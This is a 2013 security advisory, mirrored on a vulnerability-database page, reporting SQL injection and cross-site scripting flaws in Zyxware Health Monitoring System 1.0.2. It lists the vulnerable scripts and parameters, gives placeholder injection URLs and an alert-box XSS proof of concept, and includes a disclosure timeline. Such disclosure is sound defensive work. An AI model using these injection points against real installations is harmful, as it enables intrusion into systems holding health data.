Zyxware Health Monitoring System

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1044386 漏洞类型
发布时间 2013-10-01 更新时间 2013-10-01
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2013100003
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#####################
 
  ______                                __                                       ______                     
 /      \                              /  |                                     /      \                    
/000000  |  ______    ______   ______  00 |____   _____  ____    ______        /000000  |  ______    _______
00 \__00/  /      \  /      \ /      \ 00      \ /     \/    \  /      \       00 \__00/  /      \  /       |
00      \  000000  |/000000  |000000  |0000000  |000000 0000  | 000000  |      00      \ /000000  |/0000000/
 000000  | /    00 |00 |  00/ /    00 |00 |  00 |00 | 00 | 00 | /    00 |       000000  |00    00 |00 |     
/  \__00 |/0000000 |00 |     /0000000 |00 |  00 |00 | 00 | 00 |/0000000 |      /  \__00 |00000000/ 00 \_____
00    00/ 00    00 |00 |     00    00 |00 |  00 |00 | 00 | 00 |00    00 |      00    00/ 00       |00       |
 000000/   0000000/ 00/       0000000/ 00/   00/ 00/  00/  00/  0000000/        000000/   0000000/  0000000/
                                                                                                          
#####################
 
Product: Zyxware Health Monitoring System
Product Version: 1.0.2
Vendor: Zyxware Technologies
Vendor Notification: Sept 3, 2013
Public Disclosure: Sept 9, 2013
Vulnerability Type: Sql Injection, XSS
Risk Level: High
 
Discovered and Provided By:
Sarahma Security
Sarahma Global Informatika
Website : wwww.sarahma.co.id
Email : research@sarahma.co.id
 
#####################
 
 
========================
SQL Injection
========================
Found on
http://localhost/healthmonitor/maps/diseaseinfo.php
Parameter : strDiseaseName
http://localhost/healthmonitor/maps/diseaseinfo.php?strDiseaseName=1'{SQL_HERE}
 
Found On
http://localhost/healthmonitor/maps/summary.php
Parameter : opt
http://localhost/healthmonitor/maps/summary.php?opt=1'{SQL_HERE}&type=Dist
 
 
========================
XSS Vulnerability
========================
Found On :
http://localhost/healthmonitor/maps/diseaseinfo.php
parameter : rightContent
 
http://localhost/healthmonitor/maps/googlemap.php
parameter : mapheight and mapwidth
 
http://localhost/healthmonitor/maps/khmheading.php
parameter : imageheight
 
http://localhost/healthmonitor/maps/moreinfo.php
parameter : rightContent
 
http://localhost/healthmonitor/maps/summary.php
parameter : opt  and rightContent
 
Example :
http://localhost/healthmonitor/maps/khmheading.php?imageheight=0&imagePadding=%22%3Cscript%3E%20alert%28%27XSS%27%29%3C/script%3E
 
 
========================
Solution :
========================
No Update Until This Advisory published
 
 
========================
Timeline:
========================
2013-09-03 Provided details to vendor
2013-09-08 No Response From vendor
2013-09-09 Advisory published